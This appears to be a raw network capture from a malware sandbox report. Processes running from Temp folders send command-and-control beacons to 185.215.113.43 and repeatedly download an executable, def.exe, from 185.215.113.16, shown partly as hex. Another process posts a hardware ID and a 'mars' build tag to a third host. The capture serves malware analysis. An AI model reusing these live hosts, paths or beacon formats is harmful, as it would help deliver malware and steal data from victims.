Nov 15, 2024 14:10:43.646281004 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:43.646291018 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:43.646517038 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:43.646532059 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:43.646543026 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:43.646553040 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:43.646657944 CET	1236	IN	Data Raw: 72 c1 4e 61 4a e6 51 1a d3 f5 4f a2 c2 3f f3 4f 6f 2a dd 3f 30 0c ec ff fd af 0d 23 99 2c 7e 2c 2b 3d a4 bb 93 4e bd 7f 7b 76 13 4a a4 08 62 1f e0 b0 31 50 1c bb 4a 04 d1 0e 55 06 e1 b8 86 2d e4 c3 41 60 4a ba 45 68 2e 9f 2e 0a bf a5 54 b1 0b 5e Data Ascii: rNaJQO?Oo?0#,~,+=N{vJb1PJU-A`JEh..T^E=dF: ?[.Od&LA3<@1Rl#8~)KFR$%8@\ .)s7-K'2c,G^2?ZA{8hD7n]{>KQ{/8O.a9
Nov 15, 2024 14:10:43.646667957 CET	1236	IN	Data Raw: 5e c2 27 6a 86 c2 33 3e 6f 55 b0 49 c9 9d 2d d3 0f 95 41 46 42 0c 0c 43 00 3a 14 5a e6 fd 43 61 10 95 03 40 72 dd ff 5e 77 cc c5 e1 e5 c2 e7 5f 10 e1 27 92 42 f9 d7 4b 34 26 e2 85 0e 9d cb 2a 40 9e a3 a5 c8 41 3b d8 e5 3d 1c 61 50 ae c3 b1 57 85 Data Ascii: ^'j3>oUI-AFBC:ZCa@r^w_'BK4&@A;=aPW}`p(GNlz:O?k]ilG#Kt"A\Rc/J* GN)#3#O9Q afo~Z'A.=WcUz0MDC!JAP!RB
Nov 15, 2024 14:10:43.646677971 CET	1236	IN	Data Raw: 26 a3 3e 5b 3c 05 28 2f 23 da 77 5f db 59 3d cd d4 cc 29 92 16 b2 13 fb c9 e7 fc 82 35 65 e3 fb 2b 9a fd 90 d4 46 0a 1d 61 e8 62 2e f0 ab 02 eb 1f bd e3 6f c6 dc b6 7d e0 cd cd 7d 31 ec d7 a6 57 b2 db 52 e2 e8 f3 58 d7 73 a4 60 4e 12 1f ae 92 57 Data Ascii: &>[<(/#w_Y=)5e+Fab.o}}1WRXs`NWC0p\}o=Rf"zLoo/x5Lvc_(:)0fLXM`ybz)0Nx594CA%vb1qB)[vQ:<#0-;_5.t1VzufW2+
Nov 15, 2024 14:10:43.651300907 CET	1120	IN	Data Raw: cd fa 6e f5 f7 a9 4c 26 f4 25 53 1d ad c9 09 41 c4 b2 3d a1 c3 a9 e7 31 c1 93 5b 79 c7 ba 70 50 c4 b9 f5 53 11 ae 99 ee 42 66 61 8a 25 7c 2b d3 0e 7f e0 5c 27 db 2f 22 10 cb 39 6d 2e ee db 53 be e0 f1 5e 34 ec e6 12 90 a2 50 f1 7f d8 dc 9e 2f 65 Data Ascii: nL&%SA=1[ypPSBfa%\|+\'/"9m.S^4P/e/6SI>B=:D"dY#Pk'LL7Jk/$$PRz"Q{\+nHSMPI(}[j/w;DR#7)X/]+gd5k&n#c(}V2@t$P:q/)l%dn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50049	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:48.049074888 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 34 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006443001&unit=246122658369
Nov 15, 2024 14:10:48.963121891 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50051	185.215.113.16	80	5960	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:48.484817982 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 15, 2024 14:10:49.363377094 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:49 GMT Content-Type: application/octet-stream Content-Length: 2790400 Last-Modified: Fri, 15 Nov 2024 12:57:58 GMT Connection: keep-alive ETag: "67374556-2a9400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+`Ui` @ @.rsrc`2@.idata 8@fnateuls@4:@eutlwerm n@.taggant@+"r@
Nov 15, 2024 14:10:49.363395929 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.363411903 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.363426924 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.363441944 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.364150047 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.364166021 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.364182949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:49.364198923 CET	760	IN	Data Raw: 8d 4b 51 7b bf 2f 38 85 4f 2a b6 2e 61 c3 93 c4 14 82 39 11 f3 c9 2d 19 07 7e e8 2d 84 00 09 df c3 76 e1 19 05 07 4b da 54 ef 08 ef 45 62 51 18 0d ca 37 6e fe 24 26 db 81 85 6b 63 02 5c 78 e1 5d 0e 34 23 7e 3b 4b b3 bf cc b2 2a 7c a1 37 b2 dc 4c Data Ascii: KQ{/8O.a9-~-vKTEbQ7n$&kc\x]4#~;K\|7Lq/2O21RhjPX@:aaq/UAkyn1@;4tFmRSPU^BkrH9**o.GFa0"EH=PpI@ ]36
Nov 15, 2024 14:10:49.364216089 CET	1236	IN	Data Raw: d0 08 2d d8 cd ba 1e 1c cc 53 54 9f f6 c9 55 24 2f c1 b6 63 e6 94 f5 91 44 d2 55 9e e3 f4 52 30 ff 09 2c 77 4a f9 f7 95 f1 9e fb 17 d4 f6 c6 7f 8e c5 3a c8 c5 83 82 59 5e 30 9e e1 27 8c 13 24 33 77 27 68 08 82 ca 79 fa 06 8f 37 d1 26 c5 23 60 9e Data Ascii: -STU$/cDUR0,wJ:Y^0'$3w'hy7&#`0.Tr6oo:DB \|+Lb sOEz_kQFJ8esA3T6n"L#UcC9G]f}O^k^}a(;Hdm"I\ Y
Nov 15, 2024 14:10:49.368490934 CET	1236	IN	Data Raw: 09 48 8e a2 ae d9 00 5a ff 54 e8 44 d3 0c 71 39 90 c1 90 6d 26 e4 cb 42 c8 39 fc ac 23 43 a2 42 ca 39 f4 1c 4c 7b 0d 64 c8 ff ea 76 d8 dc a6 15 7b 5a 5e 79 5e 48 3b 16 20 5b c7 a3 1d bd 65 16 55 e7 0d c2 eb 22 1e 8b 0c a3 f3 bb cc 08 64 76 11 da Data Ascii: HZTDq9m&B9#CB9L{dv{Z^y^H; [eU"dvB+D$pxk2%-~H9,$=l1BD?wH%_3Lw,yrzD]kJ78#'7RmW,pSB5xB%s'x'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50058	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:51.488279104 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:10:52.522486925 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50061	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:54.032624006 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:10:54.960088968 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50065	185.215.113.16	80	6304	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:56.570190907 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 15, 2024 14:10:57.518280029 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:57 GMT Content-Type: application/octet-stream Content-Length: 2790400 Last-Modified: Fri, 15 Nov 2024 12:57:58 GMT Connection: keep-alive ETag: "67374556-2a9400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+`Ui` @ @.rsrc`2@.idata 8@fnateuls@4:@eutlwerm n@.taggant@+"r@
Nov 15, 2024 14:10:57.518352032 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:57.518404961 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:57.518441916 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:57.518476009 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:57.518511057 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:57.518546104 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:10:57.518853903 CET	1236	IN	Data Raw: 72 c1 4e 61 4a e6 51 1a d3 f5 4f a2 c2 3f f3 4f 6f 2a dd 3f 30 0c ec ff fd af 0d 23 99 2c 7e 2c 2b 3d a4 bb 93 4e bd 7f 7b 76 13 4a a4 08 62 1f e0 b0 31 50 1c bb 4a 04 d1 0e 55 06 e1 b8 86 2d e4 c3 41 60 4a ba 45 68 2e 9f 2e 0a bf a5 54 b1 0b 5e Data Ascii: rNaJQO?Oo?0#,~,+=N{vJb1PJU-A`JEh..T^E=dF: ?[.Od&LA3<@1Rl#8~)KFR$%8@\ .)s7-K'2c,G^2?ZA{8hD7n]{>KQ{/8O.a9
Nov 15, 2024 14:10:57.518908024 CET	1236	IN	Data Raw: 5e c2 27 6a 86 c2 33 3e 6f 55 b0 49 c9 9d 2d d3 0f 95 41 46 42 0c 0c 43 00 3a 14 5a e6 fd 43 61 10 95 03 40 72 dd ff 5e 77 cc c5 e1 e5 c2 e7 5f 10 e1 27 92 42 f9 d7 4b 34 26 e2 85 0e 9d cb 2a 40 9e a3 a5 c8 41 3b d8 e5 3d 1c 61 50 ae c3 b1 57 85 Data Ascii: ^'j3>oUI-AFBC:ZCa@r^w_'BK4&@A;=aPW}`p(GNlz:O?k]ilG#Kt"A\Rc/J* GN)#3#O9Q afo~Z'A.=WcUz0MDC!JAP!RB
Nov 15, 2024 14:10:57.518944979 CET	1236	IN	Data Raw: 26 a3 3e 5b 3c 05 28 2f 23 da 77 5f db 59 3d cd d4 cc 29 92 16 b2 13 fb c9 e7 fc 82 35 65 e3 fb 2b 9a fd 90 d4 46 0a 1d 61 e8 62 2e f0 ab 02 eb 1f bd e3 6f c6 dc b6 7d e0 cd cd 7d 31 ec d7 a6 57 b2 db 52 e2 e8 f3 58 d7 73 a4 60 4e 12 1f ae 92 57 Data Ascii: &>[<(/#w_Y=)5e+Fab.o}}1WRXs`NWC0p\}o=Rf"zLoo/x5Lvc_(:)0fLXM`ybz)0Nx594CA%vb1qB)[vQ:<#0-;_5.t1VzufW2+
Nov 15, 2024 14:10:57.523508072 CET	1120	IN	Data Raw: cd fa 6e f5 f7 a9 4c 26 f4 25 53 1d ad c9 09 41 c4 b2 3d a1 c3 a9 e7 31 c1 93 5b 79 c7 ba 70 50 c4 b9 f5 53 11 ae 99 ee 42 66 61 8a 25 7c 2b d3 0e 7f e0 5c 27 db 2f 22 10 cb 39 6d 2e ee db 53 be e0 f1 5e 34 ec e6 12 90 a2 50 f1 7f d8 dc 9e 2f 65 Data Ascii: nL&%SA=1[ypPSBfa%\|+\'/"9m.S^4P/e/6SI>B=:D"dY#Pk'LL7Jk/$$PRz"Q{\+nHSMPI(}[j/w;DR#7)X/]+gd5k&n#c(}V2@t$P:q/)l%dn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50066	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:56.593898058 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:10:57.521681070 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50067	185.215.113.206	80	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:56.958647013 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 15, 2024 14:10:57.866374969 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:10:57.900099039 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 43 46 32 31 31 36 46 38 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 4b 4b 4a 4b 4a 45 42 46 42 47 43 42 41 41 46 49 2d 2d 0d 0a Data Ascii: ------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="hwid"BCCF2116F8A11720009369------IJDBKKJKJEBFBGCBAAFIContent-Disposition: form-data; name="build"mars------IJDBKKJKJEBFBGCBAAFI--
Nov 15, 2024 14:10:58.184032917 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50068	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:10:59.522144079 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:00.324186087 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50077	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:02.031842947 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
